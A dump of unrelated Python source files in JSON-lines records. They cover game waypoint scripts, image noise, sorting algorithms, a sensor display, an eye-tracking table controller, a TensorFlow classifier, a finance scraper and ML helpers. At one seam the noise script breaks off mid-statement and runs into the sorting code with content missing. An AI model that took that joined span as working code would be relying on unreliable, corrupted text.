kUp)\n\tkThis.SetSpeed(25.000000)\n\tkThis.Update(0)\n\tkThis = None\n\t# End position \"Sun\"\n\n\t# Position \"Sun2\"\n\tkThis = App.Waypoint_Create(\"Sun2\", sSetName, None)\n\tkThis.SetStatic(1)\n\tkThis.SetNavPoint(0)\n\tkThis.SetTranslateXYZ(-17500.000000, -250000.000000, 4000.000000)\n\tkForward = App.TGPoint3()\n\tkForward.SetXYZ(0.000000, 1.000000, 0.000000)\n\tkUp = App.TGPoint3()\n\tkUp.SetXYZ(0.000000, 0.000000, 1.000000)\n\tkThis.AlignToVectors(kForward, kUp)\n\tkThis.SetSpeed(25.000000)\n\tkThis.Update(0)\n\tkThis = None\n\t# End position \"Sun2\"\n\n\t# Position \"Sun3\"\n\tkThis = App.Waypoint_Create(\"Sun3\", sSetName, None)\n\tkThis.SetStatic(1)\n\tkThis.SetNavPoint(0)\n\tkThis.SetTranslateXYZ(17500.000000, 1700000.000000, -2000.000000)\n\tkForward = App.TGPoint3()\n\tkForward.SetXYZ(0.000000, 1.000000, 0.000000)\n\tkUp = App.TGPoint3()\n\tkUp.SetXYZ(0.000000, 0.000000, 1.000000)\n\tkThis.AlignToVectors(kForward, kUp)\n\tkThis.SetSpeed(25.000000)\n\tkThis.Update(0)\n\tkThis = None\n\t# End position \"Sun3\"\n\n\t# Position \"Kavis Beta\"\n\tkThis = App.Waypoint_Create(\"Kavis Beta\", sSetName, None)\n\tkThis.SetStatic(1)\n\tkThis.SetNavPoint(1)\n\tkThis.SetTranslateXYZ(17500.000000, 1550000.000000, -2000.000000)\n\tkForward = App.TGPoint3()\n\tkForward.SetXYZ(0.000000, 1.000000, 0.000000)\n\tkUp = App.TGPoint3()\n\tkUp.SetXYZ(0.000000, 0.000000, 1.000000)\n\tkThis.AlignToVectors(kForward, kUp)\n\tkThis.SetSpeed(25.000000)\n\tkThis.Update(0)\n\tkThis = None\n\t# End position \"Kavis Beta\"\n\n\t# Position \"Kavis Nuetron Star - Accreation cloud\"\n\tkThis = App.Waypoint_Create(\"Kavis Nuetron Star - Accreation cloud\", sSetName, None)\n\tkThis.SetStatic(1)\n\tkThis.SetNavPoint(1)\n\tkThis.SetTranslateXYZ(-43500.000000, -300000.000000, 4000.000000)\n\tkForward = 
App.TGPoint3()\n\tkForward.SetXYZ(0.000000, 1.000000, 0.000000)\n\tkUp = App.TGPoint3()\n\tkUp.SetXYZ(0.000000, 0.000000, 1.000000)\n\tkThis.AlignToVectors(kForward, kUp)\n\tkThis.SetSpeed(25.000000)\n\tkThis.Update(0)\n\tkThis = None\n\t# End position \"Kavis Nuetron Star - Accreation cloud\"\n\n\t# Position \"Kavis Alpha - Observation Point\"\n\tkThis = App.Waypoint_Create(\"Kavis Alpha - Observation Point\", sSetName, None)\n\tkThis.SetStatic(1)\n\tkThis.SetNavPoint(1)\n\tkThis.SetTranslateXYZ(-5500.000000, -178000.000000, 1000.000000)\n\tkForward = App.TGPoint3()\n\tkForward.SetXYZ(0.000000, 1.000000, 0.000000)\n\tkUp = App.TGPoint3()\n\tkUp.SetXYZ(0.000000, 0.000000, 1.000000)\n\tkThis.AlignToVectors(kForward, kUp)\n\tkThis.SetSpeed(25.000000)\n\tkThis.Update(0)\n\tkThis = None\n\t# End position \"Kavis Alpha - Observation Point\"\n\n\t# Position \"Planet Location\"\n\tkThis = App.Waypoint_Create(\"Planet Location\", sSetName, None)\n\tkThis.SetStatic(1)\n\tkThis.SetNavPoint(0)\n\tkThis.SetTranslateXYZ(1500.000000, -850.000000, -500.000000)\n\tkForward = App.TGPoint3()\n\tkForward.SetXYZ(0.000000, 1.000000, 0.000000)\n\tkUp = App.TGPoint3()\n\tkUp.SetXYZ(0.000000, 0.000000, 1.000000)\n\tkThis.AlignToVectors(kForward, kUp)\n\tkThis.SetSpeed(25.000000)\n\tkThis.Update(0)\n\tkThis = None\n\t# End position \"Planet Location\"\n\n\t# Position \"Player Start\"\n\tkThis = App.Waypoint_Create(\"Player Start\", sSetName, None)\n\tkThis.SetStatic(1)\n\tkThis.SetNavPoint(0)\n\tkThis.SetTranslateXYZ(0.000000, 0.000000, 0.000000)\n\tkForward = App.TGPoint3()\n\tkForward.SetXYZ(0.000000, 1.000000, 0.000000)\n\tkUp = App.TGPoint3()\n\tkUp.SetXYZ(0.080718, 0.000000, 0.996737)\n\tkThis.AlignToVectors(kForward, kUp)\n\tkThis.SetSpeed(25.000000)\n\tkThis.Update(0)\n\tkThis = None\n\t# End position \"Player Start\"\n\nimport App\n\ndef LoadBackdrops(pSet):\n\n\t#Draw order is implicit. 
First object gets drawn first\n\n\t# Star Sphere \"Backdrop stars\"\n\tkThis = App.StarSphere_Create()\n\tkThis.SetName(\"Backdrop stars\")\n\tkThis.SetTranslateXYZ(0.000000, 0.000000, 0.000000)\n\tkForward = App.TGPoint3()\n\tkForward.SetXYZ(0.185766, 0.947862, -0.258938)\n\tkUp = App.TGPoint3()\n\tkUp.SetXYZ(0.049825, 0.254099, 0.965894)\n\tkThis.AlignToVectors(kForward, kUp)\n\tkThis.SetTextureFileName(\"data/stars.tga\")\n\tkThis.SetTargetPolyCount(256)\n\tkThis.SetHorizontalSpan(1.000000)\n\tkThis.SetVerticalSpan(1.000000)\n\tkThis.SetSphereRadius(320.000000)\n\tkThis.SetTextureHTile(2.000000)\n\tkThis.SetTextureVTile(2.000000)\n\tkThis.Rebuild()\n\tpSet.AddBackdropToSet(kThis,\"Backdrop stars\")\n\tkThis.Update(0)\n\tkThis = None\n\t# End Backdrop Sphere \"Backdrop stars\"\n\n\t# Backdrop Sphere \"Backdrop zmNebcustom3\"\n\tkThis = App.BackdropSphere_Create()\n\tkThis.SetName(\"Backdrop zmNebcustom3\")\n\tkThis.SetTranslateXYZ(0.000000, 0.000000, 0.000000)\n\tkForward = App.TGPoint3()\n\tkForward.SetXYZ(-0.302035, -0.953278, 0.005955)\n\tkUp = App.TGPoint3()\n\tkUp.SetXYZ(-0.008883, 0.009061, 0.999920)\n\tkThis.AlignToVectors(kForward, kUp)\n\tkThis.SetTextureFileName(\"data/Backgrounds/High/zmNebcustom3.tga\")\n\tkThis.SetTargetPolyCount(256)\n\tkThis.SetHorizontalSpan(0.164025)\n\tkThis.SetVerticalSpan(0.328050)\n\tkThis.SetSphereRadius(300.000000)\n\tkThis.SetTextureHTile(1.000000)\n\tkThis.SetTextureVTile(1.000000)\n\tkThis.Rebuild()\n\tpSet.AddBackdropToSet(kThis,\"Backdrop zmNebcustom3\")\n\tkThis.Update(0)\n\tkThis = None\n\t# End Backdrop Sphere \"Backdrop zmNebcustom3\"\n\n\t# Backdrop Sphere \"Backdrop zmNebcustom4\"\n\tkThis = App.BackdropSphere_Create()\n\tkThis.SetName(\"Backdrop zmNebcustom4\")\n\tkThis.SetTranslateXYZ(0.000000, 0.000000, 0.000000)\n\tkForward = App.TGPoint3()\n\tkForward.SetXYZ(-0.207927, -0.946019, 0.248624)\n\tkUp = App.TGPoint3()\n\tkUp.SetXYZ(0.061027, 0.241138, 0.968570)\n\tkThis.AlignToVectors(kForward, kUp)\n\tkThis.SetTextureFileName(\"data/Backgrounds/High/zmNebcustom4.tga\")\n\tkThis.SetTargetPolyCount(256)\n\tkThis.SetHorizontalSpan(0.111451)\n\tkThis.SetVerticalSpan(0.202638)\n\tkThis.SetSphereRadius(300.000000)\n\tkThis.SetTextureHTile(1.000000)\n\tkThis.SetTextureVTile(1.000000)\n\tkThis.Rebuild()\n\tpSet.AddBackdropToSet(kThis,\"Backdrop zmNebcustom4\")\n\tkThis.Update(0)\n\tkThis = None\n\t# End Backdrop Sphere \"Backdrop zmNebcustom4\"\n\n\t# Backdrop Sphere \"Backdrop treknebula7\"\n\tkThis = App.BackdropSphere_Create()\n\tkThis.SetName(\"Backdrop treknebula7\")\n\tkThis.SetTranslateXYZ(0.000000, 0.000000, 0.000000)\n\tkForward = App.TGPoint3()\n\tkForward.SetXYZ(0.245580, 0.964443, 0.097674)\n\tkUp = App.TGPoint3()\n\tkUp.SetXYZ(0.119808, -0.130184, 0.984225)\n\tkThis.AlignToVectors(kForward, kUp)\n\tkThis.SetTextureFileName(\"data/Backgrounds/High/treknebula7.tga\")\n\tkThis.SetTargetPolyCount(256)\n\tkThis.SetHorizontalSpan(0.230686)\n\tkThis.SetVerticalSpan(0.350137)\n\tkThis.SetSphereRadius(300.000000)\n\tkThis.SetTextureHTile(1.000000)\n\tkThis.SetTextureVTile(1.000000)\n\tkThis.Rebuild()\n\tpSet.AddBackdropToSet(kThis,\"Backdrop treknebula7\")\n\tkThis.Update(0)\n\tkThis = None\n\t# End Backdrop Sphere \"Backdrop treknebula7\"\n\n","sub_path":"scripts/Systems/KavisAlpha/KavisAlpha2.py","file_name":"KavisAlpha2.py","file_ext":"py","file_size_in_byte":8938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"24807565","text":"\r\n\"\"\"\r\nCreated on Fri Aug 28 17:19:20 
2020\r\n\r\n@author: jadin\r\n\r\nsalt and pepper noise can be handled efficiently by a median filter,\r\nwhich is a low-pass filter\r\n\"\"\"\r\n\r\nimport cv2\r\nimport numpy as np\r\nimport random\r\nimport matplotlib.pyplot as plt\r\n\r\npath = \"C:\\\\Users\\\\jadin\\\\Downloads\\\\misc\\\\misc\\\\\"\r\n\r\npath1 = path + \"4.2.07.tiff\"\r\n\r\nimg = cv2.imread(path1, 1)\r\n\r\nimg = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n\r\nrows, columns, channels = img.shape\r\np = 0.1\r\noutput = np.zeros(img.shape, np.uint8)\r\n\r\nfor i in range(rows):\r\n    for j in range(columns):\r\n        r = random.random()\r\n        if r

lista[i + 1]:\n                    temp = lista[i]\n                    lista[i] = lista[i + 1]\n                    lista[i + 1] = temp\n        return lista\n\n    \"\"\"Selection sort algorithm\"\"\"\n    def seleccion(self, lista):\n        \"\"\"\n        :param lista: input list\n        :return: sorted list\n        \"\"\"\n        tamanio = len(lista)\n        for i in range(tamanio - 1):\n            for j in range(i + 1, tamanio):\n                if lista[i] > lista[j]:\n                    lista[i], lista[j] = lista[j], lista[i]\n        return lista\n\n    \"\"\"Radix sort algorithm\"\"\"\n    def radixSort(self, lista):\n        \"\"\"\n        :param lista: input list\n        :return: sorted list\n        \"\"\"\n        RADIX = 10\n        maxLength = False\n        tmp, placement = -1, 1\n\n        while not maxLength:\n            maxLength = True\n            cubos = [list() for _ in range(RADIX)]\n            for i in lista:\n                tmp = i // placement\n                cubos[tmp % RADIX].append(i)\n                if maxLength and tmp > 0:\n                    maxLength = False\n\n            a = 0\n            for b in range(RADIX):\n                salto = cubos[b]\n                for i in salto:\n                    lista[a] = i\n                    a += 1\n            placement *= RADIX\n        return lista\n\n    \"\"\"QuickSort algorithm\"\"\"\n    def quickSort(self, lista):\n        \"\"\"\n        :param lista: input list\n        :return: sorted list\n        \"\"\"\n        if (len(lista) <= 1):\n            return lista\n\n        pivot = lista[len(lista) // 2]\n\n        lt = [i for i in lista if i < pivot]\n        eq = [pivot] * lista.count(pivot)\n        gt = [i for i in lista if i > pivot]\n        lista = self.quickSort(lt) + eq + self.quickSort(gt)\n        return lista\n\n    \"\"\"MergeSort algorithm\"\"\"\n    def mergeSort(self, lista):\n        \"\"\"\n        :param lista: input list\n        :return: sorted list\n        \"\"\"\n        if len(lista) > 1:\n            medio = len(lista) // 2\n            izquierda = lista[:medio]\n            derecha = lista[medio:]\n            self.mergeSort(izquierda)\n            self.mergeSort(derecha)\n            i = 0\n            j = 0\n            k = 0\n            while i < len(izquierda) and j < len(derecha):\n                if izquierda[i] <= derecha[j]:\n                    lista[k] = izquierda[i]\n                    i += 1\n                else:\n                    lista[k] = derecha[j]\n                    j += 1\n                k += 1\n            while i < len(izquierda):\n                lista[k] = izquierda[i]\n                i += 1\n                k += 1\n            while j < len(derecha):\n                lista[k] = derecha[j]\n                j += 1\n                k += 1\n        return lista\n","sub_path":"src/main/python/co/edu/unbosque/model/AgoritmoDeOrdenamiento.py","file_name":"AgoritmoDeOrdenamiento.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"47253728","text":"import machine, ssd1306, dht\nfrom time import sleep\n\n#OLED\ni2c = machine.I2C(scl=machine.Pin(4), sda=machine.Pin(5))\noled = ssd1306.SSD1306_I2C(128, 64, i2c)\n\n#DHT\nsensor = dht.DHT22(machine.Pin(0))\n#sensor = dht.DHT11(Pin(14))\n\n#DHT logic\nwhile True:\n    try:\n        sleep(2)\n        sensor.measure()\n        temp = sensor.temperature()\n        hum = sensor.humidity()\n        temp_f = temp * (9/5) + 32.0\n        print('Temperature: %3.1f C' %temp)\n        #print('Temperature: %3.1f F' %temp_f)\n        print('Humidity: %3.1f %%' %hum)\n        print()\n        oled.fill(0)\n        oled.text('Temp: %3.1f C' %temp, 20, 20)\n        oled.text('Humi: %3.1f %%' %hum, 20, 40)\n        oled.show()\n    except OSError as e:\n        print('Failed to read sensor.')\n\n\n#OLED display info text\n#fill 0 (black), fill 1 (white)\n#oled.fill(1)\n#the last number below (0 or 1) is optional: 0 is black, 1 is white font\n#oled.text('Hello, World 1!', 0, 0, 0)\n#oled.show()\n\n\n\n","sub_path":"MicroPython/ESP32/oled/DHT_ssd1306.py","file_name":"DHT_ssd1306.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"377182650","text":"'Credit : Mohit Singh'\n\n#Import necessary libraries\nfrom scipy.spatial 
import distance\nfrom imutils import face_utils\nimport numpy as np\nimport time\nimport dlib\nimport cv2\nimport threading\nfrom SerialFinal import distanceUs1, moveLinear\nfrom multiprocessing import Process , Pipe\nimport threading\nimport queue\nfrom num2words import num2words\nimport subprocess as sp\n\n\n\n\n\n\ndef camera(yVal):\n count = 1\n countsp = 0\n leftEyeSend,leftEyeRecv = Pipe()\n \n p1 = Process(target = condEye, args=(yVal, leftEyeRecv))\n p1.start()\n \n #Load face detector and predictor, uses dlib shape predictor file\n detector = dlib.get_frontal_face_detector()\n predictor = dlib.shape_predictor('shape_predictor_68_face_landmarks.dat')\n\n #Extract indexes of facial landmarks for the left and right eye\n (lStart, lEnd) = face_utils.FACIAL_LANDMARKS_IDXS['left_eye']\n (rStart, rEnd) = face_utils.FACIAL_LANDMARKS_IDXS['right_eye']\n\n #Start webcam video capture\n video_capture = cv2.VideoCapture(0)\n \n try:\n while True:\n \n #Read each frame and flip it, and convert to grayscale\n ret, frame = video_capture.read()\n frame = cv2.flip(frame,1)\n frame = cv2.resize(frame, (300, 240))\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n \n \n faces = detector(gray, 0)\n \n\n\n #making reference lines\n frame = cv2.line(frame, (0,yVal-40),(1279,yVal-40),(0,0,255),2)\n frame = cv2.line(frame, (0,yVal),(1279,yVal),(0,0,255),2)\n \n #Show video feed\n cv2.imshow('EYE_DETECTION',frame )\n \n if len(faces) == 0:\n print(\"Faceless\")\n \n if count == 20:\n print('count>>20')\n sp.Popen([\"aplay /home/pi/Documents/Group4_SMART_TABLE/soundForSOT/noPeople.wav 2>/dev/null\"], shell=True)\n leftEyeSend.close()\n p1.terminate()\n time.sleep(0.1)\n return ''\n else:\n count +=1\n moveLinear('stop')\n continue\n \n \n\n if len(faces) > 1:\n print('there are more than one person in the camera')\n moveLinear('stop')\n if countsp == 0:\n sp.Popen([\"aplay /home/pi/Documents/Group4_SMART_TABLE/soundForSOT/morePeople.wav 2>/dev/null\"], shell=True)\n countsp +=1\n continue\n\n\n shape = predictor(gray, faces[0])\n shape = face_utils.shape_to_np(shape)\n\n #Get array of coordinates of leftEye and rightEye\n leftEye = shape[lStart:lEnd]\n \n leftEyeSend.send(leftEye[0][1])\n count = 1\n countsp = 0\n \n# if not p1.is_alive():\n# leftEyeSend.close()\n# # p1.terminate()\n# time.sleep(0.1)\n# cv2.destroyAllWindows()\n# print('p1 is terminated')\n# return ''\n \n if cv2.waitKey(1) & 0xFF == ord(\"q\"):\n p1.terminate()\n time.sleep(0.1)\n cv2.destroyAllWindows()\n return\n \n \n except KeyboardInterrupt:\n moveLinear('stop')\n leftEyeSend.close()\n p1.terminate()\n time.sleep(0.1)\n video_capture.release()\n cv2.destroyAllWindows()\n return\n \n \n \ndef condEye(yVal,left):\n \n \n cond = ''\n countDone = 0\n countUp = 0\n countDown = 0\n while True:\n test = left.recv()\n\n if test >= yVal-30 and test <= yVal-10:\n cond = 'stop'\n moveLinear(cond)\n print(\"Good position\")\n countDone+=1\n countDown = 0\n countUp = 0\n if countDone == 10: \n sp.Popen([\"aplay /home/pi/Documents/Group4_SMART_TABLE/soundForSOT/DoneMove.wav 2>/dev/null\"], shell=True)\n \n \n elif test < yVal-40:\n cond = 'up'\n moveLinear(cond)\n print(\"Table is moving up\")\n countDone = 0\n countDown = 0\n countUp += 1\n\n if countUp==10:\n sp.Popen([\"aplay /home/pi/Documents/Group4_SMART_TABLE/soundForSOT/Up.wav 2>/dev/null\"], shell=True)\n# \n \n elif test > yVal:\n cond = 'down'\n moveLinear(cond)\n print(\"Table is moving down\")\n countDone = 0\n countUp = 0\n countDown += 1\n if countDown == 10:\n sp.Popen([\"aplay 
/home/pi/Documents/Group4_SMART_TABLE/soundForSOT/Down.wav 2>/dev/null\"], shell=True)\n \n \n \n \n \n \nif __name__ == '__main__':\n\n y = distanceUs1()\n x = camera(y)\n \n while x == '':\n cv2.destroyAllWindows()\n time.sleep(3)\n \n x = camera(distanceUs1())\n ","sub_path":"ProjectFinal.py","file_name":"ProjectFinal.py","file_ext":"py","file_size_in_byte":5187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"236521708","text":"#Malik Abu-Kalokoh,\n\nimport os\nimport sys\n#Savng all outputs and redirecting to surpress unneeded output\nstderr = sys.stderr\nsys.stderr = open('/dev/null', 'w')\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\nimport tensorflow as tf\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.utils import shuffle\nsys.stderr = stderr\nnp.random.seed(42)\n\nfilename = sys.argv[1] #Should be file for breast cancer\n\nnames = ['Sample code number','Clump Thickness', 'Uniformity of Cell Size',\n 'Uniformity of Cell Shape', 'Marginal Adhesion',\n 'Single Epithelial Cell Size', 'Bare Nuclei', 'Bland Chromatin',\n 'Normal Nucleoli', 'Mitoses', 'Class']\n\ndataset = pd.read_csv(filename, names=names,keep_default_na=True, na_values='?')\n\n#Remove messed up data\ndel dataset['Sample code number']\ndataset.dropna(inplace=True)\n\noutput = dataset['Class']\n#One Hot Encoding\noutput = pd.get_dummies(output, columns=['Class'])\ndel dataset['Class']\nX = dataset\ndel dataset\nY = output\n\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.1)\n\n# Parameters\nlearning_rate = 0.1\nnum_steps = 2000\nbatch_size = 128\ndisplay_step = 100\n\n# Network Parameters\nn_hidden_1 = 15\nn_hidden_2 = 14\nn_hidden_3 = 13\nn_hidden_4 = 12\nnum_input = len(list(X))\nnum_classes = len(list(Y))\n\ninit = tf.global_variables_initializer()\n\n# tf Graph input\nX = tf.placeholder(\"float\", [None, num_input])\nY = tf.placeholder(\"float\", [None, num_classes])\n\nweights = {\n 'h1': tf.Variable(tf.random_normal([num_input, n_hidden_1])),\n 'h2': tf.Variable(tf.random_normal([n_hidden_1, n_hidden_2])),\n 'h3': tf.Variable(tf.random_normal([n_hidden_2, n_hidden_3])),\n 'h4': tf.Variable(tf.random_normal([n_hidden_3, n_hidden_4])),\n 'out': tf.Variable(tf.random_normal([n_hidden_4, num_classes]))\n}\nbiases = {\n 'b1': tf.Variable(tf.random_normal([n_hidden_1])),\n 'b2': tf.Variable(tf.random_normal([n_hidden_2])),\n 'b3': tf.Variable(tf.random_normal([n_hidden_3])),\n 'b4': tf.Variable(tf.random_normal([n_hidden_4])),\n 'out': tf.Variable(tf.random_normal([num_classes]))\n}\n\n# Create model\ndef neural_net(x):\n out1 = tf.add(tf.matmul(x, weights['h1']), biases['b1'])\n out1 = tf.nn.relu(out1)\n out2 = tf.add(tf.matmul(out1, weights['h2']), biases['b2'])\n out2 = tf.nn.relu(out2)\n out3 = tf.layers.dense(out2, 2)\n\n return out3\n\n# Construct model\nlogits = neural_net(X)\n\n# Define loss and optimizer\nloss_op = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(\n logits=logits, labels=Y))\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\ntrain_op = optimizer.minimize(loss_op)\n\n# Evaluate model (with test logits, for dropout to be disabled)\ncorrect_pred = tf.equal(tf.argmax(logits, 1), tf.argmax(Y, 1))\naccuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n# Initialize the variables (i.e. 
assign their default value)\ninit = tf.global_variables_initializer()\n\n# Start training\nwith tf.Session() as sess:\n sess.run(init)\n\n for step in range(1, num_steps+1):\n training = pd.concat([X_train,Y_train],axis=1).sample(batch_size)\n batch_x = pd.DataFrame(training,columns=list(X_train))\n batch_y = pd.DataFrame(training,columns=list(Y_train))\n # Run optimization op (backprop)\n sess.run(train_op, feed_dict={X: batch_x, Y: batch_y})\n if step % display_step == 0 or step == 1:\n # Calculate batch loss and accuracy\n loss, acc = sess.run([loss_op, accuracy], feed_dict={X: batch_x,\n Y: batch_y})\n print(\"Step \" + str(step) + \", Minibatch Loss= \" + \\\n \"{:.4f}\".format(loss) + \", Training Accuracy= \" + \\\n \"{:.3f}\".format(acc))\n\n print(\"Optimization Finished!\")\n\n # Calculate accuracy for MNIST test images\n t_data = X_test\n t_results = Y_test\n print(\"Testing Accuracy:\",\n sess.run(accuracy, feed_dict={X: t_data,\n Y: t_results}))\n","sub_path":"Homework_3/HW3_malik18_1.py","file_name":"HW3_malik18_1.py","file_ext":"py","file_size_in_byte":4051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"184169623","text":"# -*- coding: utf-8 -*-\nfrom spider import *\nfrom setting import *\nimport requests\nfrom lxml import etree\nfrom selenium import webdriver\n\ndef getNewsItem(url):\n pass\n\ndef getIndices():\n baseUrl = 'https://uk.finance.yahoo.com/intlindices?e='\n e = ['europe','us','asia','americas','africa']\n IndicesDriver = webdriver.PhantomJS(executable_path='/Users/guti/phantomjs-2.1.1-macosx/bin/phantomjs')\n ComponentsDriver = webdriver.PhantomJS(executable_path='/Users/guti/phantomjs-2.1.1-macosx/bin/phantomjs')\n for each in e:\n url = baseUrl+each\n IndicesDriver.get(url)\n elem = IndicesDriver.find_elements_by_xpath('//div[@id=\"yfitp\"]/table/tbody/tr')\n for i in elem:\n symbol = i.find_element_by_xpath('./td[@class=\"first\"]/span/a').text\n name = i.find_element_by_xpath('./td[@class=\"second name\"]').text\n stocklist = []\n tdLast = i.find_elements_by_xpath('./td[@class=\"last\"]/a')\n if len(tdLast) == 3:\n link = tdLast[0].get_attribute('href')\n page = 0\n while True:\n try:\n ComponentsDriver.get(link+'&c=%s'%page)\n stockElement = ComponentsDriver.find_elements_by_xpath('//tbody/tr/td/b/a')\n if len(stockElement)==0:\n break\n for j in stockElement:\n stocklist.append(j.text)\n page += 1\n except:\n break\n res = {}\n res['symbol'] = symbol\n res['name'] = name\n res['stockList'] = stocklist\n res['region'] = each\n print(res)\n\n\n ComponentsDriver.close()\n IndicesDriver.close()\n\n\n\n\n\n\n\n\n\n\n\nclass yahooFinanceSpider(spider):\n def __init__(self):\n spider.__init__(self)\n self.changeCollection('yahooNews')\n\n def getNewsList(self):\n\n url = 'https://uk.finance.yahoo.com/news/index/'\n try:\n response = self.session.get(url,headers = DEFAULT_REQUEST_HEADERS)\n except:\n print(\"session get error\")\n if response.ok:\n selector = etree.HTML(response.text)\n\n else:\n print(response.status_code)\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n # y = yahooFinanceSpider()\n # y.getNewsList()\n getIndices()","sub_path":"crawl/yahooFinanceSpider.py","file_name":"yahooFinanceSpider.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"286816000","text":"import turtle\n\nwindow = turtle.Screen()\nwindow.bgcolor(\"blue\")\n\n\ndef set_brad():\n brad = turtle.Turtle(\"turtle\")\n 
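# NB: the \"turtle\" shape was already set by the Turtle() constructor argument, so\n    # the shape() call below is redundant (harmless); turtle treats speeds above 10\n    # as 0, i.e. speed(56) means \"fastest, no animation\".\n    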
brad.shape(\"turtle\")\n brad.color(\"red\")\n brad.speed(56)\n return brad\n\n\ndef draw_square(who):\n while(True):\n for i in range(0, 4):\n who.forward(100)\n who.right(90)\n who.right(2)\n\ndraw_square(set_brad())\n\nwindow.exitonclick()\n","sub_path":"project03/art_flower.py","file_name":"art_flower.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"332244040","text":"\"\"\"\nMethods for sc-ML project \n\nReferenced to Pinkwink & sklearn-github\n\nhttps://pinkwink.kr/\nhttps://github.com/scikit-learn/scikit-learn\n\n\nUsecase\n-------\nimport utils as ut\n\n\nut.split_train_test(socar_rd_cp)\n\n\"\"\"\n# Authors : dockyum \n# EbraLim \n# ryuseunghwan1 \n\n#!pip install imblearn\n\n\nimport time\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# model selection\nfrom sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score, roc_auc_score, confusion_matrix\nfrom sklearn.metrics import roc_curve\n\n# sampler\nfrom imblearn.over_sampling import SMOTE, SMOTENC, SMOTEN, ADASYN, BorderlineSMOTE, KMeansSMOTE, SVMSMOTE\nfrom imblearn.over_sampling import RandomOverSampler\n\n# pipeline\nfrom sklearn.base import BaseEstimator\nfrom sklearn.pipeline import Pipeline\n\n# scaler\nfrom sklearn.preprocessing import RobustScaler, StandardScaler, MinMaxScaler\n\n# models\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom lightgbm import LGBMClassifier\nfrom sklearn.svm import LinearSVC\nfrom sklearn.svm import SVC\n\n# CV\nfrom sklearn.model_selection import KFold, GridSearchCV, StratifiedKFold\n\n\n# Sampler\n\nsamplers = [('SMOTE', SMOTE(random_state=13)),\n ('ADASYN', ADASYN(random_state=13)), \n ('BorderlineSMOTE', BorderlineSMOTE(random_state=13)), \n ('KMeansSMOTE', KMeansSMOTE(random_state=13)), \n ('SVMSMOTE', SVMSMOTE(random_state=13)), \n ('RandomOverSampler', RandomOverSampler(random_state=13))]\n\n# Scaler\nscalers = [('No', None ),\n ('RB', RobustScaler()),\n ('SD', StandardScaler()),\n ('MM', MinMaxScaler()),]\n\n# Estimator\nclfs = [('LogisticReg', LogisticRegression(random_state=13, max_iter=1000)),\n ('DecisionTree', DecisionTreeClassifier(random_state=13)),\n ('RandomForest', RandomForestClassifier(random_state=13)),\n ('LightGBM', LGBMClassifier(random_state=13)),\n ('SVC', SVC(random_state=13))]\n\nclf_names = [clf[0] for clf in clfs]\n \n \n# parameters\n\nlr_params = [{'clf__penalty': ['l2'], \n 'clf__class_weight' : [{0: 0.01, 1: 1.0}, {0: 0.005, 1: 1},'balanced']}] \ndt_params = [{'clf__max_depth' : [3, 4, 6, 8, 10, 30], \n 'clf__max_features': [None,'sqrt','log2'], \n 'clf__class_weight' : [{0: 0.01, 1: 1.0}, {0: 0.005, 1: 1},'balanced']}]\nrf_params = [{'clf__n_estimators': [50, 100, 200, 400], \n 'clf__max_depth' : [4, 6, 8, 10, 30],\n 'clf__class_weight' : [{0: 0.01, 1: 1.0}, {0: 0.005, 1: 1},'balanced']}]\nlgbm_params = [{'clf__n_estimators' : [50, 100, 200, 400], \n 'clf__num_leaves': [4, 8, 16],\n 'clf__class_weight' : [{0: 0.01, 1: 1.0}, {0: 0.005, 1: 1},'balanced']}]\nsvc_params = [{'clf__kernel': ['rbf'], \n 'clf__class_weight' : ['balanced'],\n 'clf__C' : [0.1, 1.0]}]\n\n \n# X_Train, X_Test, y_train, y_test 데이터 분리\ndef split_train_test(df):\n \"\"\"\n Split sc dataset into train and test subsets easily.\n \n \n Parameters\n ---------- \n df : DataFrame\n \n \n return\n ---------- \n 
X_train, X_test, y_train, y_test\n \n .\n\n \"\"\"\n train_set = df[df['c_25'] == 0]\n test_set = df[df['c_25'] == 1]\n\n X_train = train_set.drop(['c_25','c_1'], axis=1)\n y_train = train_set['c_1']\n\n X_test = test_set.drop(['c_25', 'c_1'], axis=1)\n y_test = test_set['c_1']\n \n print('==Split Result==')\n print('y_train : ', list(map(lambda x: x.tolist(), np.unique(y_train, return_counts=True))))\n print('y_test :', list(map(lambda x: x.tolist(), np.unique(y_test, return_counts=True))) )\n\n return X_train, X_test, y_train, y_test\n\n\n# 선택한 Sampler 적용하여 데이터 샘플링\ndef fit_sampler(X_train, \n y_train, \n sampler='SMOTE'):\n \"\"\"\n Sampler selector and fit_resample\n \n\n Parameters\n ----------\n X_train : \n Train data of features\n \n y_train : \n Train data of labels\n \n sampler : (string), default='SMOTE'\n 'ADASYN', 'BorderlineSMOTE', 'KMeansSMOTE', 'SVMSMOTE', 'RandomOverSampler'\n\n Return\n ---------- \n X_train_over, y_train_over\n \n .\n \n \"\"\"\n sampler_selected = [one[1] for one in samplers if one[0] == sampler][0]\n\n X_train_over, y_train_over = sampler_selected.fit_resample(X_train, 